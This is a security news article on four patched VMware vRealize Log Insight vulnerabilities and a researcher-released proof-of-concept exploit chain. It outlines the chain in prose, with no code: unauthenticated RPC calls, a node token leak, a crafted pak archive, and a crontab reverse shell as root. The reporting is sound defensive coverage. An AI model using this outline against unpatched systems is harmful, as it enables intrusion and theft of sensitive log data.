VMware published patches last week for four vulnerabilities in its vRealize Log Insight product that, if combined, could allow attackers to take over the log collection and analytics platform.
This week, a proof-of-concept exploit chain has been released by security researchers, along with detailed explanations for each vulnerability, meaning in-the-wild attacks could soon follow.
“Gaining access to the Log Insight host provides some interesting possibilities to an attacker, depending on the type of applications that are integrated with it,” researchers with penetration testing firm Horizon3.ai said in their analysis of the flaws.
“Often logs ingested may contain sensitive data from other services and may allow an attack to gather session tokens, API keys and PII. Those keys and sessions may allow the attacker to pivot to other systems and further compromise the environment.”
Vulnerabilities can together unlock a powerful attack
This is an interesting case that showcases a common reality of modern software security, in which one vulnerability on its own cannot lead to a significant compromise, but combining several together can unlock a powerful attack.
The first vulnerability, tracked as CVE-2022-31704, is described by VMware in its advisory as a broken access control without offering any additional details about where it might be located. However, the manual workaround script published by the company alongside the product updates offered some clues.
The script simply added a firewall rule that blocked access to TCP ports 16520 through 16580. Based on Horizon3's investigation and notes in the vRealize Log Insight documentation, these ports are used for communication using the Apache Thrift RPC (remote procedure call) framework. RPC is an inter-process communication protocol, through which one process can direct another process to execute a certain procedure.
“This information tells us that the vulnerability is likely in an RPC server,” the researchers said in their writeup. “Next, we log into the running system and find that TCP port 16520 is created by a java application.”
The researchers managed to track down the component responsible for starting a Thrift RPC server which exposes several remote procedure calls. They then built a simple Thrift RPC client to make one of those calls and saw that the calls went through and were executed without authentication, hence the broken access control.
But this vulnerability alone, while providing access to potentially powerful RPCs, is not sufficient by itself to execute malicious code.
Second vulnerability is a directory traversal issue
Enter the second vulnerability, CVE-2022-31706, which is described as a directory traversal issue. Directory traversal is a condition that allows an attacker or a malicious process to navigate to a filesystem path they're not supposed to.
While looking at the RPCs exposed by the Thrift RPC the researchers found one called remotePakDownloadCommand that downloads a file with the .pak (probably package) extension and places it in the /tmp/ directory. Another RPC called pakUpgradeCommand can then be used to invoke a Python script that unpacks this file.
These two commands are used to perform system upgrades so the researchers realised the directory traversal flaw is probably somewhere in the processing of pak files.
It turns out pak files are TAR format archives and their processing before extraction involves validating signatures, integrity checks, manifest checks, and several other steps.
"If we can construct a tar file that passes all of these checks, we will hit line 493 and extractFiles will parse our malicious tar, allowing us to write a file with contents of our choosing to any place on the file system," the researchers said.
“Admittedly, we spent some time manually constructing a tar file that would pass all of these checks before we realised that we could simply use a legitimate upgrade file with a small modification to accommodate our payload.”
vRealize Log Insight forced to download malicious pak file
At this point, the researchers had the information required to force the vRealize Log Insight product to download a malicious pak file without authentication and then place a malicious payload anywhere on the system. Except for one problem: invoking the remotePakDownloadCommand requires a node token to work, a unique value generated per instance of Log Insight.
While this token is not directly available to an unauthenticated user, it can be leaked by invoking other RPCs such as getConfig and getHealthStatus. This is likely the information disclosure issue that VMware tracks in CVE-2022-31711 in its advisory.
Using this, the Horizon3 researchers were able to construct a proof-of-concept exploit that places a new entry into crontab — the task scheduling mechanism on Linux-based systems — which when executed opens a reverse shell with root privileges back to the attackers.
The fourth vulnerability in VMware's advisory is a deserialisation issue tracked as CVE-2022-31710 that can be exploited to crash the system leading to a denial-of-service condition. This vulnerability is not required for the exploit chain that results in remote code execution.
Log Insight is used to collect and analyse logs from local networks so it's not typical to find such systems exposed to the internet. Shodan searches of the public IP space revealed only 45 instances.
However, if an attacker gains access to the local network, which can be achieved in many ways, and the Log Insight server is not fire-walled off, it can be compromised and potentially use for lateral movement due to the sensitive data it might contain.
The Horizon3 researchers released indicators of compromise that allow organisations to check their deployments for signs of exploitation. VMware has released a workaround script that blocks traffic to the port numbers associated with the Thrift RPC server, as well as version 8.10.2 of vRealise Log Insight which patches the flaws.